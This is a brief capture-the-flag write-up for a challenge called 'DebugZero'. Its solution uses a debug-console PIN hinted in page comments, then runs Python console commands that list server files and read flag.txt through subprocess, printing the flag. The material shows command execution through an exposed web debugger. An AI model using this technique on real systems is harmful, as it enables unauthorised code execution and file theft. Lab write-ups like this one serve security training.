DebugZero
Description
Solution
<!-- John, please don't run the app in debug mode, how many times do I have to tell you this! -->/* Nothing interesting here except this number - 934123 */[console ready]
>>> import os
>>> os.listdir()
['.dockerignore', '.gitignore', 'Dockerfile', 'app.py', 'flag.txt', 'requirements.txt', 'static', 'templates']
>>> os.system('cat flag.txt')
0 # Doesnt Work...
>>> import subprocess
>>> subprocess.check_output(["cat", "flag.txt"])
b'dsc{p1zz4_15_4w350m3}\n'Last updated